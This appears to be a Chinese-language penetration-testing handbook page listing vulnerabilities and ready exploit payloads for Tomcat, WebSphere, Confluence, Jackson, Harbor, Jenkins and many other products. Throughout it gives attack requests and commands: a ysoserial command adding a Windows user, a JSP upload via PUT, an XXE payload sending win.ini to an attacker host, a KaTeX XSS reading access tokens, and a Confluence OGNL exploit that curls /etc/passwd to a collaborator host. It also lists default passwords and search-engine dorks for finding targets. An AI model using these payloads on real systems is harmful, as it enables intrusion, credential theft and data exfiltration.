- Tomcat 7.0.0 ~ 7.0.72
- Tomcat 6.0.0 ~ 6.0.47
-
相关文章
-
POC | Payload | exp
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 192.168.48.211 10001 Groovy1 "C:\Windows\System32\net.exe user test 12345 /add "
CVE-2017-12615/12616
-
描述
2017年9月19日,Apache Tomcat 官方确认并修复了两个高危漏洞,漏洞 CVE 编号:CVE-2017-12615 和 CVE-2017-12616,该漏洞受影响版本为7.0.0-7.0.80之间,官方评级为高危,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险.
-
CVE-2017-12615:远程代码执行漏洞
当 Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法 (例如,将 readonly 初始化参数由默认值设置为 false) ,攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行.导致服务器上的数据泄露或获取服务器权限.
-
CVE-2017-12616:信息泄露漏洞
当 Tomcat 中启用了 VirtualDirContext 时,攻击者将能通过发送精心构造的恶意请求,绕过设置的相关安全限制,或是获取到由 VirtualDirContext 提供支持资源服务的 JSP 源代码,从而造成代码信息泄露.
-
-
漏洞利用条件
-
CVE-2017-12615 漏洞利用需要在 Windows 环境,且需要将 readonly 初始化参数由默认值设置为 false,经过实际测试,Tomcat 7.x 版本内 web.xml 配置文件内默认配置无 readonly 参数,需要手工添加,默认配置条件下不受此漏洞影响.
-
CVE-2017-12616 漏洞需要在 server.xml 文件配置 VirtualDirContext 参数,经过实际测试,Tomcat 7.x 版本内默认配置无 VirtualDirContext 参数,需要手工添加,默认配置条件下不受此漏洞影响.
-
-
影响版本
- CVE-2017-12615 影响版本 : Apache Tomcat 7.0.0 ~ 7.0.79 (windows 环境)
- CVE-2017-12616 影响版本 : Apache Tomcat 7.0.0 ~ 7.0.80
-
相关文章
-
POC | Payload | exp
PUT /1.jsp/ HTTP/1.1 Host: your-ip:8080 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 5 <% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>
CVE-2017-12617
-
描述
运行启用了 HTTP PUT 的 Apache Tomcat 特定版本时(例如,通过将默认 servlet 的只读初始化参数设置为 false)可以通过特制请求将 JSP 文件上载到服务器。然后可以请求此 JSP,并且服务器将执行其中包含的所有代码。
-
影响版本
- Apache Tomcat 7.0.0 ~ 7.0.81
- Apache Tomcat 8.0.0 ~ 8.0.17
-
相关文章
-
POC | Payload | exp
-
MSF Module
use exploit/multi/http/tomcat_jsp_upload_bypass
CVE-2018-11784 Tomcat URL跳转漏洞
-
描述
当 Apache Tomcat 版本 9.0.0.M1 到 9.0.11、8.5.0 到 8.5.33 和 7.0.23 到 7.0.90 中的默认 servlet 返回到一个目录的重定向(例如,当用户请求'/foo'时重定向到'/foo/’),一个特制的 URL 可用于导致重定向生成到攻击者选择的任何 URI。
-
影响版本
- Apache Tomcat 9.0.0.M1 ~ 9.0.11
- Apache Tomcat 8.5.0 ~ 8.5.33
- Apache Tomcat 7.0.23 ~ 7.0.90
-
相关文章
-
POC | Payload | exp
http://[ip:port]//[baidu.com]/..;/[可访问目录/可访问目录]
默认存在的 docs 目录也可以被利用,例
http://[ip:port]//[baidu.com]/..;/docs/images
CVE-2019-0232
-
描述
该漏洞是由于 Tomcat CGI 将命令行参数传递给 Windows 程序的方式存在错误,使得 CGIServlet 被命令注入影响。
该漏洞只影响 Windows 平台,要求启用了 CGIServlet 和 enableCmdLineArguments 参数。但是 CGIServlet 和 enableCmdLineArguments 参数默认情况下都不启用。
-
影响版本
- Apache Tomcat 7.0.0 ~ 7.0.93
- Apache Tomcat 8.0.0 ~ 8.5.39
- Apache Tomcat 9.0.1 ~ 9.0.17
-
相关文章
-
POC | Payload | exp
CVE-2020-1938 && CNVD-2020-10487 Apache Tomcat Ghostcat 漏洞
-
描述
Apache Tomcat 会开启 AJP 连接器,方便与其他 Web 服务器通过 AJP 协议进行交互。由于 Tomcat 本身也内含了 HTTP 服务器,因此也可以视作单独的 Web 服务器。
但 Apache Tomcat在 AJP 协议的实现上存在漏洞,导致攻击者可以通过发送恶意的 AJP 请求,可以读取或者包含 Web 应用根目录下的任意文件,如果配合文件上传任意格式文件,将可能导致任意代码执行(RCE).该漏洞利用 AJP 服务端口实现攻击,未开启 AJP 服务对外不受漏洞影响(tomcat 默认将 AJP 服务开启并绑定至 0.0.0.0/0)。
此漏洞为文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。
-
影响版本
- Apache Tomcat = 6
- 7 <= Apache Tomcat < 7.0.100
- 8 <= Apache Tomcat < 8.5.51
- 9 <= Apache Tomcat < 9.0.31
-
相关文章
-
POC | Payload | exp
-
修复建议
- 请尽快更新 Tomcat 到安全版本。
- 临时禁用 AJP 协议端口,打开 Tomcat 配置文件
<CATALINA_BASE>/conf/service.xml
,注释掉如下行:
修改完后,重启 tomcat 即可。<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
- 除以上措施外,也可采用防火墙等方法阻止不可信任的来源访问 Tomcat AJP Connector 端口。
tomcat cluster sync-session
-
描述
tomcat 使用了自带 session 同步功能时,不安全的配置(没有使用 EncryptInterceptor)导致存在的反序列化漏洞,通过精心构造的数据包,可以对使用了 tomcat 自带 session 同步功能的服务器进行攻击。
-
POC | Payload | exp
CVE-2020-9484 Session 反序列化代码执行漏洞
-
描述
当使用 tomcat 时,如果使用了 tomcat 提供的 session 持久化功能,如果存在文件上传功能,恶意请求者通过一个流程,将能发起一个恶意请求造成服务端远程命令执行。
-
相关文章
-
POC | Payload | exp
CVE-2020-13935
-
描述
Apache Tomcat 中的 WebSocket 存在安全漏洞,该漏洞源于程序没有正确验证 payload 的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。
-
影响版本
- Apache Tomcat 10.0.0-M1-10.0.0-M6
- Apache Tomcat 9.0.0.M1-9.0.36
- Apache Tomcat 8.5.0-8.5.56
- Apache Tomcat 7.0.27-7.0.104
-
相关文章
-
POC | Payload | exp
- RedTeamPentesting/CVE-2020-13935
CVE-2020-13935.exe ws://x.x.x.x:xxxx/examples/websocket/echoStrreamAnnotation
- RedTeamPentesting/CVE-2020-13935
uWSGI
uWSGI 未授权访问漏洞
Weblogic
Websphere
CVE-2014-0910
- POC | Payload | exp
CVE-2015-7450
- POC | Payload | exp
CVE-2019-4279 Websphere ND远程命令执行
CVE-2020-4643 WebSphere XXE 漏洞
-
相关文章
-
POC | Payload | exp
xml如下: <!DOCTYPE x [ <!ENTITY % aaa SYSTEM "file:///C:/Windows/win.ini"> <!ENTITY % bbb SYSTEM "http://yourip:8000/xx.dtd"> %bbb; ]> <definitions name="HelloService" xmlns="http://schemas.xmlsoap.org/wsdl/"> &ddd; </definitions> xx.dtd如下: <!ENTITY % ccc '<!ENTITY ddd '<import namespace="uri" location="http://yourip:8000/xxeLog?%aaa;"/>'>'>%ccc;
Websphere Portal ssrf
组件
编辑器
手册
ewebeditor
相关文章
常用路径
Admin_Login.asp
Admin_Default.asp
Admin_Style.asp
Admin_UploadFile.asp
Upload.asp
Admin_ModiPwd.asp
eWebEditor.asp
db/ewebeditor.mdb
ewebeditor/login_admin.asp
eweb/login_admin.asp
editor/login_admin.asp
FCKeditor
相关文章
常用路径
FCKeditor/_samples/default.html
FCKeditor/_whatsnew.html
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.test.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
.net 目录遍历
/FCkeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=
kindeditor
kindeditor<=4.1.5 上传漏洞
-
相关文章
-
漏洞修复
- 直接删除
upload_json.*
和file_manager_json.*
- 升级 kindeditor 到最新版本
- 直接删除
ueditor
相关文章
- 百度Ueditor编辑器漏洞总结
ueditor ssrf
-
相关文章
-
POC | Payload | exp
/ueditor/jsp/getRemoteImage.jsp?upfile=http://127.0.0.1/favicon.ico?.jpg /module/ueditor/php/controller.php?action=catchimage&source%5b%5d=http://www.baidu.com" /module/ueditor/jsp/controller.jsp?action=catchimage&source%5b%5d=http://www.baidu.com"
CNVD-2017-20077 ueditor 上传漏洞
-
相关文章
-
POC | Payload | exp
序列化
相关文章
fastjson
Jackson
FasterXML Jackson 是美国 FasterXML 公司的一款适用于 Java 的数据处理工具。
主要的几个 jar 包:
- jackson-core : 核心包
- jackson-annotations : 注解包
- jackson-databind : 数据绑定包
CVE-2017-7525 Jackson-databind 反序列化漏洞
-
描述
Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target class 中有 polymorph fields,即字段类型为接口、抽象类或 Object 类型时,攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类),来实现实例化指定的类,借助某些特殊的 class,如 TemplatesImpl,可以实现任意代码执行。
-
相关文章
CVE-2017-17485 Jackson-databind 反序列化
-
描述
FasterXML Jackson 是美国 FasterXML 公司的一款适用于 Java 的数据处理工具。jackson-databind 是其中的一个具有数据绑定功能的组件。
FasterXML Jackson-databind 2.8.10 及之前版本和 2.9.x 版本至 2.9.3 版本中存在代码问题漏洞。远程攻击者可通过向 ObjectMapper 的 readValue 方法发送恶意制作的 JSON 输入并绕过黑名单利用该漏洞执行代码。
-
相关文章
CVE-2019-12086
-
描述
使用了 jackson-databind 2.x before 2.9.9 的 Java 应用,如果 ClassPath 中有 com.mysql.cj.jdbc.admin.MiniAdmin(存在于 MySQL 的 JDBC 驱动中)这个类,那么 Java 应用所在的服务器上的文件,就可能被任意读取并传送到恶意的MySQL Server。
-
相关文章
CVE-2019-12384 Jackson-databind RCE And SSRF
-
描述
6月21日,Redhat 官方发布 jackson-databind 漏洞(CVE-2019-12384)安全通告,多个 Redhat 产品受此漏洞影响,CVSS 评分为 8.1,漏洞利用复杂度高。7月22日,安全研究员 Andrea Brancaleoni 对此漏洞进行分析,并公布了该漏洞的分析文章。
该漏洞是由于 Jackson 黑名单过滤不完整而导致,当开发人员在应用程序中通过 ObjectMapper 对象调用 enableDefaultTyping 方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的 json 数据包对应用进行攻击,直接获取服务器控制权限。
-
影响版本
- Jackson-databind 2.X < 2.9.9.1
-
相关文章
-
POC | Payload | exp
CVE-2020-8840 FasterXML/jackson-databind 远程代码执行漏洞
-
影响版本
- Jackson-databind 2.X < 2.9.10.2
-
POC | Payload | exp
CVE-2020-9547 FasterXML/jackson-databind 远程代码执行漏洞
-
影响版本
- Jackson-databind 2.X < 2.9.10.4
-
POC | Payload | exp
CVE-2020-9548 FasterXML/jackson-databind 远程代码执行漏洞
-
影响版本
- Jackson-databind 2.X < 2.9.10.4
-
POC | Payload | exp
CVE-2020-11113 远程代码执行漏洞
-
影响版本
- Jackson-databind < 2.9.10.4
-
相关文章
CVE-2020-35728
- POC | Payload | exp
CVE-2020-36179 Jackson-databind SSRF&RCE
-
影响版本
- Jackson-databind < 2.9.10.7
-
相关文章
-
POC | Payload | exp
Xstream
相关文章
CVE-2020-26217
- POC | Payload | exp
CVE-2020-26258
CVE-2020-26259 任意文件删除
- POC | Payload | exp
CVE-2021-29505
JavaScript库
jQuery
检测工具
- jQuery versions with known weaknesses - 在线查找已知版本的 jQuery 漏洞
- mahp/jQuery-with-XSS
将代码中 src 后的链接修改为自己要验证的 js 地址链接。
CVE-2020-11022/11023 jQuery XSS漏洞
-
详情
在大于或等于 1.2 且在 3.5.0 之前的 jQuery 版本中,即使执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的 HTML 传递给 jQuery 的 DOM 操作方法(即 html()、.append() 等),从而导致 xss 漏洞。
-
CVE-2020-11022/CVE-2020-11023: jQuery 3.5.0 Security Fix details
CVE-2018-9206 jQuery-File-Upload 未授权任意文件上传漏洞
-
相关文章
-
POC | Payload | exp
KaTeX
xss
-
相关链接
-
案例
-
POC | Payload | exp
$$ \<script id="iplog">x=new XMLHttpRequest(); x.open("GET", "https://afternoon-fjord-12487.herokuapp.com/"); x.send();document.getElementById("id").parent.parent.style = "display:none" </script> $$
$$ \<input type=image src=/static/css/img/logo.23d7be3.svg onload=alert(localStorage.access_token)> $$
其他
AjaxPro.NET
CVE-2021-23758 AjaxPro.NET反序列化漏洞
exiftool
CVE-2021-22204
Ghostscript
CVE-2019-6116 沙箱绕过(命令执行)漏洞
- POC | Payload | exp
GhostScript-9.50 RCE
-
相关文章
-
POC | Payload | exp
ImageMagick
CVE-2016-3714
- POC | Payload | exp
Log4j
PrimeFaces
CVE-2017-1000486
-
相关文章
-
POC | Payload | exp
webuploader
webuploader-v-0.1.15 组件存在文件上传漏洞(未授权)
- POC | Payload | exp
dompdf
dompdf-rce
-
相关文章
-
POC | Payload | exp
- positive-security/dompdf-rce - RCE exploit for dompdf
服务
相关文章
Adminer
Adminer≤4.6.2任意文件读取漏洞
ApiSix
CVE-2021-43557 Request Uri目录穿越漏洞
-
相关文章
-
POC | Payload | exp
CVE-2021-45232 Apache APISIX Dashboard 认证绕过漏洞
Apollo
fofa : icon_hash="11794165"
fofa : title="Apollo配置中心"
fofa : body="apollo-adminservice"
未授权访问
-
相关文章
-
POC | Payload | exp
# apollo-adminservice # 1. 获取所有的应用基本信息(包含 appId) xxx.xxx.xxx.xxx:8090/apps # apollo-adminservice # 2. 获取相关 appId 的所有 cluster xxx.xxx.xxx.xxx:8090/apps/<appId>/clusters # apollo-adminservice # 3. 获取相关 appId 的 namespaces xxx.xxx.xxx.xxx:8090/apps/<appId>/appnamespaces # apollo-configservice # 4. 组合 appId cluster namespaceName 获取配置 configurations xxx.xxx.xxx.xxx:8080/configs/<appId>/<cluster>/<namespaceName>
AppWeb
CVE-2018-8715 AppWeb认证绕过漏洞
-
描述
其7.0.3之前的版本中,对于 digest 和 form 两种认证方式,如果用户传入的密码为 null(也就是没有传递密码参数),appweb 将因为一个逻辑错误导致直接认证成功,并返回 session。
-
POC | Payload | exp
- AppWeb认证绕过漏洞(CVE-2018-8715) - (未复现成功)
Appspace-Core
CVE-2021-27670
- POC | Payload | exp
/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://xxxx.dnslog.cn
Bitbucket
CVE-2022-36804
- POC | Payload | exp
Cacti
Fofa: app="cacti"
默认密码
admin admin
CVE-2020-8813 Cacti v1.2.8 远程命令执行漏洞
-
相关文章
-
POC | Payload | exp
celery
相关文章
Commvault
CVE-2021-34993
Confluence
Confluence 是一个专业的企业知识管理与协同软件,也可以用于构建企业 wiki。使用简单,强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。
相关文章
相关工具
- BeichenDream/PostConfluence - 哥斯拉 Confluence 后渗透插件
CVE-2019-3394 Confluence 文件读取漏洞
CVE-2019-3396 Confluence Wiki 远程代码执行
-
相关文章
-
POC | Payload | exp
CVE-2019-3398 Atlassian Confluence Download Attachments Remote Code Execution
-
描述
Confluence Server 和 Data Center 在 downloadallattachments 资源中存在路径穿越漏洞。 在 Page 或 Blogs 具有添加附件权限的用户,或具有创建新空间或个人空间权限的用户,或对某空间具有“管理员”权限的用户可利用此路径穿越漏洞将文件写入任意位置。一定条件下可以执行任意代码。
-
影响版本
- Atlassian confluence 2.0.0 ~ 6.6.13
- Atlassian confluence 6.7.0 ~ 6.12.4
- Atlassian confluence 6.13.0 ~ 6.13.4
- Atlassian confluence 6.14.0 ~ 6.14.3
-
POC | Payload | exp
CVE-2021-26084
-
相关文章
-
POC | Payload | exp
POST /pages/createpage-entervariables.action HTTP/1.1 Host: 127.0.0.1:8090 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 215 queryString=lalalala%5cu0027,(linkCreation)(0xd0ff90),%5cu0027lalalala&linkCreation=@java.lang.Runtime@getRuntime().exec('curl -X POST --data-binary @/etc/passwd xxx.burpcollaborator.net')
CVE-2021-26085
-
相关文章
-
影响版本
- Atlassian confluence < 7.4.10
- Atlassian confluence 7.5.0 ≤ ~ < 7.12.3
-
POC | Payload | exp
/s/123cfx/_/;/WEB-INF/web.xml /s/123cfx/_/;/WEB-INF/decorators.xml /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml
CVE-2022-26138
- POC | Payload | exp
disabledsystemuser disabled1system1user6708
Crowd
Atlassian Crowd 是一套基于 Web 的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center 是 Crowd 的集群部署版。
CVE-2019-11580 Atlassian Crowd 未授权访问漏洞
-
描述
Atlassian Crowd 和 Crowd Data Center 在其某些发行版本中错误地启用了 pdkinstall 开发插件,使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对 Atlassian Crowd 和 Crowd Data Center 安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限。
-
影响版本
- Atlassian Crowd 2.1.0 ~ 3.0.5
- Atlassian Crowd 3.1.0 ~ 3.1.6
- Atlassian Crowd 3.2.0 ~ 3.2.8
- Atlassian Crowd 3.3.0 ~ 3.3.5
- Atlassian Crowd 3.4.0 ~ 3.4.4
-
相关文章
-
POC | Payload | exp
Django
CVE-2020-7471 Django StringAgg SQL Injection漏洞
DolphinScheduler
Apache DolphinScheduler(目前处在孵化阶段)是一个分布式、去中心化、易扩展的可视化DAG工作流任务调度系统,其致力于解决数据处理流程中错综复杂的依赖关系,使调度系统在数据处理流程中开箱即用。
默认密码
admin dolphinscheduler
CVE-2020-13922 权限覆盖漏洞
- POC | Payload | exp
POST /dolphinscheduler/users/update id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=
flask
FlySpray
XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account)
- POC | Payload | exp
GateOne
Fofa : app="GateOne"
相关文章
CVE-2020-20184 rce
- POC | Payload | exp
GateOne.ws.send('{"terminal:ssh_get_host_fingerprint":{"host":"目标IP","port":"22;cat /etc/passwd;"}}')
CVE-2020-35736 GateOne 路径遍历漏洞
- POC | Payload | exp
/auth?next=%2F /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
Gerapy
相关文章
CVE-2021-32849
-
影响版本
- Gerapy <= 0.9.6
-
相关文章
Gitea
Gitea 1.4.0 目录穿越导致命令执行漏洞
GitLab
GitLab 的漏洞情报参考 https://gitlab.com/gitlab-org/cves/-/tree/master
CVE-2020-10977 GitLab 任意文件读取漏洞
-
影响范围
- 8.5 <= GitLab CE/EE <=12.9
-
相关文章
CVE-2021-4191
-
描述
-
影响范围
- 13.0 <= Gitlab CE/EE < <14.6.5
- 14.7 <= Gitlab CE/EE < 14.7.4
- 14.8 <= Gitlab CE/EE < 14.8.2
CVE-2021-22205
-
影响范围
- 11.9.0 <= Gitlab CE/EE < 13.8.8
- 13.9.0 <= Gitlab CE/EE < 13.9.6
- 13.10.0 <= Gitlab CE/EE < 13.10.3
-
相关文章
-
POC | Payload | exp
CVE-2021-22214
-
描述
-
影响范围
- 10.5 <= Gitlab CE/EE < 13.10.5
- 13.11 <= Gitlab CE/EE < 13.11.5
- 13.12 <= Gitlab CE/EE < 13.12.2
CVE-2022-2185
-
描述
-
影响范围
- 14.0 <= Gitlab CE/EE < 14.10.5
- 15.0 <= Gitlab CE/EE < 15.0.4
- 15.1 <= Gitlab CE/EE < 15.1.1
CVE-2022-2884
- 影响范围
11.3.4 <= GitLab CE/EE < 15.1.5
15.2 <= GitLab CE/EE < 15.2.3
15.3 <= GitLab CE/EE < 15.3.1
glpi
项目地址: https://github.com/glpi-project/glpi
fofa: app="TECLIB-GLPI"
CVE-2022-35914 GLPI htmLawedTest.php 远程命令执行漏洞
-
影响范围
GLPI <= 10.0.2 -
相关文章
GoAhead
CVE-2017-17562
-
影响范围
- GoAhead < 3.6.5
-
POC | Payload | exp
CVE-2021-42342
-
影响范围
- GoAhead =4.x
- 5.x<=GoAhead<5.1.5
-
相关文章
GoCD
未授权路径穿越
- 相关文章
Gogs
相关工具
CVE-2018-18925
CVE-2018-20303
Grafana
fofa: app="Grafana"
默认用户名密码
- admin/admin
Grafana 6.4.3 Arbitrary File Read
CVE-2020-13379
- 相关文章
CVE-2021-41174
CVE-2021-43798
-
影响版本
- Grafana 8.3.x < 8.3.1
- Grafana 8.2.x < 8.2.7
- Grafana 8.1.x < 8.1.8
- Grafana 8.0.x < 8.0.7
-
相关文章
-
POC | Payload | exp
8.x . CSRF
GraphQL
相关文章
- GraphQL安全指北
- GraphQL安全总结与测试技巧
- GraphQL漏洞笔记及案例
- GraphQL IDOR leads to information disclosure
- GraphQL - Security Overview and Testing Tips
- How to exploit GraphQL endpoint: introspection, query, mutations & tools
- Securing GraphQL. Part 1
- Why and how to disable introspection query for GraphQL APIs
- GraphQL Batching Attack
- GraphQL Batching Attacks: Turbo Intruder
相关工具
- swisskyrepo/GraphQLmap
- doyensec/inql - 用于 GraphQL 安全测试的扩展
- APIs-guru/graphql-voyager - Represent any GraphQL API as an interactive graph
- nikitastupin/clairvoyance - Obtain GraphQL API schema despite disabled introspection!
相关案例
相关靶场
- dolevf/Damn-Vulnerable-GraphQL-Application - Damn Vulnerable GraphQL Application is an intentionally vulnerable implementation of Facebook's GraphQL technology, to learn and practice GraphQL Security.
git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git && cd Damn-Vulnerable-GraphQL-Application docker build -t dvga . docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dvga
- righettod/poc-graphql - Research on GraphQL from an AppSec point of view.
introspection/自省
Introspection is the ability to query which resources are available in the current API schema. Given the API, via introspection, we can see the queries, types, fields, and directives it supports.
由于自省机制,默认情况下,任何未经身份验证的用户都可以分析 GrapQL 模式。Introspection 允许我们获取有关所有请求、mutation、订阅和数据类型的信息,以及向发出请求的客户端提供的所有其他信息。通过请求 ___schema 元字段可以轻松获得此信息,根据规范,该信息始终可用于“root”类型的查询。
Content-Type: application/json
{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
Harbor
官网 : https://goharbor.io/
Harbor 的漏洞情报参考 https://github.com/goharbor/harbor/security/advisories
相关文章
CVE-2019-3990 User Enumeration Vulnerability
-
https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg
-
描述
攻击者可通过 Harbor API 的逻辑漏洞,进行用户名枚举操作
-
影响版本
- harbor 1.7.0 ~ 1.7.6
- harbor 1.8.0 ~ 1.8.5
- harbor 1.9.0 ~ 1.9.1
-
POC | Payload | exp
GET /api/users/search?email=@test .com => {"code":400,"message":"username is required"} GET /api/users/search?username=t => User Enumeration
CVE-2019-16097 任意管理员注册漏洞
-
描述
攻击者可以利用该漏洞,在未授权的情况下发送恶意请求创建管理员账号,从而接管 Harbor 镜像仓库。
-
POC | Payload | exp
CVE-2019-19030
-
https://github.com/goharbor/harbor/security/advisories/GHSA-q9x4-q76f-5h5j
-
描述
该漏洞将导致未授权的攻击者可以利用 harbor API 对 harbor 实例进行未经认证的调用,并根据响应中的 http 状态码去区分存在哪些资源,不存在哪些资源。
CVE-2020-13788 ssrf
-
描述
harbor 的 "Test Endpoint" API 在设计上存在脆弱性,可能会导致攻击者使用此 API 对 Harbor 服务器内部网络主机上开放的 TCP 端口进行扫描,从而使攻击者能够对内网资产进行探测。
-
POC | Payload | exp
CVE-2020-13794
-
https://github.com/goharbor/harbor/security/advisories/GHSA-q9p8-33wc-h432
-
描述
harbor 的 /users API 设计上存在用户名枚举漏洞,针对普通用户,可通过 /api/users/search API 发送带有 username 和 _ 的 GET 请求列出所有用户名和 ID 信息。
CVE-2020-29662
-
https://github.com/goharbor/harbor/security/advisories/GHSA-38r5-34mr-mvm7
-
描述
harbor 的 v2 API 暴露在未经身份验证的 URL 上,导致非管理员身份用户进行访问的风险。
HFS
HFS远程命令执行漏洞
-
描述
Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
-
案例
-
POC | Payload | exp
/?search==%00{.exec|cmd.exe /c [Command-String].}
Horde_Groupware_Webmail
Horde Groupware Webmail Edition 远程命令执行
-
描述
Horde Groupware Webmail 是美国 Horde 公司的一套基于浏览器的企业级通信套件。 Horde Groupware Webmail 中存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。
-
POC | Payload | exp
HUE
命令执行漏洞
- POC | Payload | exp
Hue 后台编辑器存在命令执行漏洞,攻击者通过编辑上传 xxx.sh 文件即可达到命令执行的目的
ixcache
FOFA:title="iXCache"
默认口令
admin
ixcache
jellyfin
fofa: title="jellyfin"
CVE-2020-26948 ssrf
-
描述
Emby Server 4.5.0之前的版本允许通过Items/RemoteSearch/Image ImageURL参数进行SSRF。
-
POC | Payload | exp
CVE-2021-21402
- POC | Payload | exp
CVE-2021-29490
- POC | Payload | exp
/Images/Remote?imageUrl=<URL> /Items/RemoteSearch/Image?ImageUrl=<URL>&ProviderName=TheMovieDB
Jenkins
官网 : https://jenkins.io/
app="Jenkins"
Jenkins 的漏洞情报参考 https://jenkins.io/security/advisories/
搭建教程
相关文章
- Hacking Jenkins Part 1 - Play with Dynamic Routing
- Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
- Jenkins RCE漏洞分析汇总
- 安全研究 | Jenkins漏洞分析
资源
相关工具
- blackye/Jenkins - Jenkins漏洞探测、用户抓取爆破
未授权访问漏洞
-
描述
默认情况下 Jenkins 面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
-
相关文章
-
利用
http://[ip]:8080/manage
CVE-2017-1000353 未授权远程代码执行漏洞
-
描述
Jenkins 未授权远程代码执行漏洞, 允许攻击者将序列化的 Java SignedObject 对象传输给 Jenkins CLI 处理,反序列化 ObjectInputStream 作为 Command 对象,这将绕过基于黑名单的保护机制, 导致代码执行。
-
影响版本
- jenkins < 2.56
-
POC | Payload | exp
CVE-2018-1000861 远程命令执行漏洞
-
描述
Jenkins 使用 Stapler 框架开发,其允许用户通过 URL PATH 来调用一次 public 方法.由于这个过程没有做限制,攻击者可以构造一些特殊的 PATH 来执行一些敏感的 Java 方法.
通过这个漏洞,我们可以找到很多可供利用的利用链.其中最严重的就是绕过 Groovy 沙盒导致未授权用户可执行任意命令:Jenkins 在沙盒中执行 Groovy 前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过 Meta-Programming 的方式,在检查这个步骤时执行任意命令.
-
影响版本
- jenkins < 2.153
-
POC | Payload | exp
CVE-2018-1999001 配置文件路径改动导致管理员权限开放漏洞
-
描述
Jenkins 官方在 7 月 18 号发布了安全公告,对 Jenkins 的两个高危漏洞进行通告,其中包括配置文件路径改动导致管理员权限开放的漏洞 CVE-2018-1999001,未授权用户通过发送一个精心构造的登录凭据,能够致使匿名用户获取 Jenkins 的管理权限。
-
影响版本
- jenkins < 2.121.1
- jenkins 2.122 ~ 2.132
-
相关文章
CVE-2018-1999002 任意文件读取漏洞
-
描述
Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是未授权任意文件读取漏洞。攻击者可以发送精心制作的 HTTP 请求,以返回 Jenkins 主文件中任何文件的内容,该漏洞存在于 Stapler Web 框架的 org/kohsuke/stapler/Stapler.java 中。
-
影响版本
- jenkins < 2.121.1
- jenkins 2.122 ~ 2.132
-
相关文章
CVE-2019-1003000 未授权访问 RCE 漏洞
-
描述
脚本安全插件 1.49 和更早版本的 src/main/Java/org/jenkinsci/plugins/Script Security/sandbox/groovy/GroovysandBox.Java 中存在沙箱绕过漏洞,使得攻击者能够提供沙箱脚本在 Jenkins 主 JVM 上执行任意代码。
-
影响版本
- jenkins < 1.49
-
相关文章
-
